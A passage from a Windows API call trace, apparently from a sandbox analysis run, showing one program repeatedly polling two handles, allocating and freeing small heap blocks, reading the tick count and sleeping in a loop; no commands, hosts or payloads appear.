dwMilliseconds=0x0) returned 0x0 [0188.500] GetTickCount () returned 0x2102d2e [0188.500] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.500] GetTickCount () returned 0x2102d2e [0188.500] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.500] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0188.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.504] GetTickCount () returned 0x21035c4 [0188.504] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65230 [0188.504] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.504] GetTickCount () returned 0x21035c4 [0188.504] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.504] GetTickCount () returned 0x21035c4 [0188.504] GetTickCount () returned 0x21035c4 [0188.504] GetTickCount () returned 0x21035c4 [0188.504] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.504] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.504] GetTickCount () returned 0x21035c4 [0188.504] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.504] GetTickCount () returned 0x21035c4 [0188.504] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.504] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65230 | out: hHeap=0x2150000) returned 1 [0188.504] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.519] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.521] GetTickCount () returned 0x2103e6a [0188.521] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0188.521] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.521] GetTickCount () returned 0x2103e6a [0188.521] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.521] GetTickCount () returned 0x2103e6a [0188.521] GetTickCount () returned 0x2103e6a [0188.521] GetTickCount () returned 0x2103e6a [0188.521] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.521] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.521] GetTickCount () returned 0x2103e6a [0188.521] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.521] GetTickCount () returned 0x2103e6a [0188.521] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.521] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0188.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.525] GetTickCount () returned 0x210470f [0188.525] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.525] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.525] GetTickCount () returned 0x210470f [0188.525] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.525] GetTickCount () returned 0x210470f [0188.525] GetTickCount () returned 0x210470f [0188.525] GetTickCount () returned 0x210470f [0188.525] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.525] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.525] GetTickCount () returned 0x210470f [0188.525] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.525] GetTickCount () returned 0x210470f [0188.525] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.525] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.527] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.529] GetTickCount () returned 0x2104fa5 [0188.529] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0188.529] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.529] GetTickCount () returned 0x2104fa5 [0188.529] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.529] GetTickCount () returned 0x2104fa5 [0188.529] GetTickCount () returned 0x2104fa5 [0188.529] GetTickCount () returned 0x2104fa5 [0188.529] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.529] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.529] GetTickCount () returned 0x2104fa5 [0188.529] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.529] GetTickCount () returned 0x2104fa5 [0188.529] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.529] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0188.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.530] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.532] GetTickCount () returned 0x210583b [0188.532] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ff0 [0188.532] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.532] GetTickCount () returned 0x210583b [0188.532] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.532] GetTickCount () returned 0x210583b [0188.532] GetTickCount () returned 0x210583b [0188.532] GetTickCount () returned 0x210583b [0188.532] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.532] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.532] GetTickCount () returned 0x210583b [0188.532] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.532] GetTickCount () returned 0x210583b [0188.532] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.532] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ff0 | out: hHeap=0x2150000) returned 1 [0188.533] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.536] GetTickCount () returned 0x21060d1 [0188.536] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650b0 [0188.536] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.536] GetTickCount () returned 0x21060d1 [0188.536] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.536] GetTickCount () returned 0x21060d1 [0188.536] GetTickCount () returned 0x21060d1 [0188.536] GetTickCount () returned 0x21060d1 [0188.536] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.536] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.536] GetTickCount () returned 0x21060d1 [0188.536] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.536] GetTickCount () returned 0x21060d1 [0188.536] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.536] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650b0 | out: hHeap=0x2150000) returned 1 [0188.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.541] GetTickCount () returned 0x2106977 [0188.541] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b70 [0188.541] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.541] GetTickCount () returned 0x2106977 [0188.541] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.541] GetTickCount () returned 0x2106977 [0188.541] GetTickCount () returned 0x2106977 [0188.541] GetTickCount () returned 0x2106977 [0188.541] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.541] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.541] GetTickCount () returned 0x2106977 [0188.541] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.541] GetTickCount () returned 0x2106977 [0188.541] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.541] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b70 | out: hHeap=0x2150000) returned 1 [0188.541] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.545] GetTickCount () returned 0x210720d [0188.545] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0188.545] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.545] GetTickCount () returned 0x210720d [0188.545] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.545] GetTickCount () returned 0x210720d [0188.545] GetTickCount () returned 0x210720d [0188.545] GetTickCount () returned 0x210720d [0188.545] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.545] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.545] GetTickCount () returned 0x210720d [0188.545] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.545] GetTickCount () returned 0x210720d [0188.545] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.545] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0188.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.546] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.548] GetTickCount () returned 0x2107aa3 [0188.548] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0188.548] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.548] GetTickCount () returned 0x2107aa3 [0188.548] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.548] GetTickCount () returned 0x2107aa3 [0188.548] GetTickCount () returned 0x2107aa3 [0188.548] GetTickCount () returned 0x2107aa3 [0188.548] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.548] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.548] GetTickCount () returned 0x2107aa3 [0188.548] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.548] GetTickCount () returned 0x2107aa3 [0188.548] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.548] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0188.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.555] GetTickCount () returned 0x2108349 [0188.555] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e30 [0188.555] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.555] GetTickCount () returned 0x2108349 [0188.556] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.556] GetTickCount () returned 0x2108349 [0188.556] GetTickCount () returned 0x2108349 [0188.556] GetTickCount () returned 0x2108349 [0188.556] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.556] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.556] GetTickCount () returned 0x2108349 [0188.556] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.556] GetTickCount () returned 0x2108349 [0188.556] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.556] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e30 | out: hHeap=0x2150000) returned 1 [0188.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.559] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.560] GetTickCount () returned 0x2108bdf [0188.560] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cb0 [0188.560] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.560] GetTickCount () returned 0x2108bdf [0188.560] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.560] GetTickCount () returned 0x2108bdf [0188.560] GetTickCount () returned 0x2108bdf [0188.560] GetTickCount () returned 0x2108bdf [0188.560] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.560] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.560] GetTickCount () returned 0x2108bdf [0188.560] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.560] GetTickCount () returned 0x2108bdf [0188.560] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.560] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cb0 | out: hHeap=0x2150000) returned 1 [0188.560] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.563] GetTickCount () returned 0x2109475 [0188.563] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0188.563] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.564] GetTickCount () returned 0x2109475 [0188.564] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.564] GetTickCount () returned 0x2109475 [0188.564] GetTickCount () returned 0x2109475 [0188.564] GetTickCount () returned 0x2109475 [0188.564] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.564] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.564] GetTickCount () returned 0x2109475 [0188.564] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.564] GetTickCount () returned 0x2109475 [0188.564] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.564] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0188.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.567] GetTickCount () returned 0x2109d0b [0188.567] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0188.567] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.567] GetTickCount () returned 0x2109d0b [0188.567] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.567] GetTickCount () returned 0x2109d0b [0188.567] GetTickCount () returned 0x2109d0b [0188.567] GetTickCount () returned 0x2109d0b [0188.567] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.567] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.567] GetTickCount () returned 0x2109d0b [0188.567] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.567] GetTickCount () returned 0x2109d0b [0188.567] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.567] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0188.568] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.573] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.575] GetTickCount () returned 0x210a5b0 [0188.575] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ef0 [0188.575] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.575] GetTickCount () returned 0x210a5b0 [0188.575] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.575] GetTickCount () returned 0x210a5b0 [0188.575] GetTickCount () returned 0x210a5b0 [0188.575] GetTickCount () returned 0x210a5b0 [0188.575] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.575] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.575] GetTickCount () returned 0x210a5b0 [0188.575] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.575] GetTickCount () returned 0x210a5b0 [0188.575] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.575] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ef0 | out: hHeap=0x2150000) returned 1 [0188.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.577] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.578] GetTickCount () returned 0x210ae46 [0188.578] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c30 [0188.578] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.579] GetTickCount () returned 0x210ae46 [0188.579] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.579] GetTickCount () returned 0x210ae46 [0188.579] GetTickCount () returned 0x210ae46 [0188.579] GetTickCount () returned 0x210ae46 [0188.579] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.579] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.579] GetTickCount () returned 0x210ae46 [0188.579] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.579] GetTickCount () returned 0x210ae46 [0188.579] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.579] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c30 | out: hHeap=0x2150000) returned 1 [0188.579] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.580] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.582] GetTickCount () returned 0x210b6dc [0188.582] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c30 [0188.582] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.583] GetTickCount () returned 0x210b6dc [0188.583] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.583] GetTickCount () returned 0x210b6dc [0188.583] GetTickCount () returned 0x210b6dc [0188.583] GetTickCount () returned 0x210b6dc [0188.583] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.583] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.583] GetTickCount () returned 0x210b6dc [0188.583] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.583] GetTickCount () returned 0x210b6dc [0188.583] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.583] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c30 | out: hHeap=0x2150000) returned 1 [0188.583] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.584] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.593] GetTickCount () returned 0x210bf82 [0188.593] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e70 [0188.593] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.593] GetTickCount () returned 0x210bf82 [0188.593] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.593] GetTickCount () returned 0x210bf82 [0188.593] GetTickCount () returned 0x210bf82 [0188.593] GetTickCount () returned 0x210bf82 [0188.593] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.593] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.593] GetTickCount () returned 0x210bf82 [0188.593] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.593] GetTickCount () returned 0x210bf82 [0188.593] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.593] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e70 | out: hHeap=0x2150000) returned 1 [0188.593] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.595] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.596] GetTickCount () returned 0x210c818 [0188.597] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650f0 [0188.597] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.597] GetTickCount () returned 0x210c818 [0188.597] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.597] GetTickCount () returned 0x210c818 [0188.597] GetTickCount () returned 0x210c818 [0188.597] GetTickCount () returned 0x210c818 [0188.597] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.597] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.597] GetTickCount () returned 0x210c818 [0188.597] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.597] GetTickCount () returned 0x210c818 [0188.597] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.597] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650f0 | out: hHeap=0x2150000) returned 1 [0188.597] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.598] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.600] GetTickCount () returned 0x210d0ae [0188.600] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650f0 [0188.600] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.600] GetTickCount () returned 0x210d0ae [0188.600] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.600] GetTickCount () returned 0x210d0ae [0188.600] GetTickCount () returned 0x210d0ae [0188.600] GetTickCount () returned 0x210d0ae [0188.600] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.600] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.600] GetTickCount () returned 0x210d0ae [0188.600] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.600] GetTickCount () returned 0x210d0ae [0188.600] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.600] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650f0 | out: hHeap=0x2150000) returned 1 [0188.600] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.605] GetTickCount () returned 0x210d953 [0188.605] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cb0 [0188.605] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.605] GetTickCount () returned 0x210d953 [0188.605] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.605] GetTickCount () returned 0x210d953 [0188.605] GetTickCount () returned 0x210d953 [0188.605] GetTickCount () returned 0x210d953 [0188.605] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.605] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.605] GetTickCount () returned 0x210d953 [0188.605] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.605] GetTickCount () returned 0x210d953 [0188.605] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.605] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cb0 | out: hHeap=0x2150000) returned 1 [0188.605] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.607] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.608] GetTickCount () returned 0x210e1e9 [0188.608] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.608] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.609] GetTickCount () returned 0x210e1e9 [0188.609] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.609] GetTickCount () returned 0x210e1e9 [0188.609] GetTickCount () returned 0x210e1e9 [0188.609] GetTickCount () returned 0x210e1e9 [0188.609] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.609] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.609] GetTickCount () returned 0x210e1e9 [0188.609] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.609] GetTickCount () returned 0x210e1e9 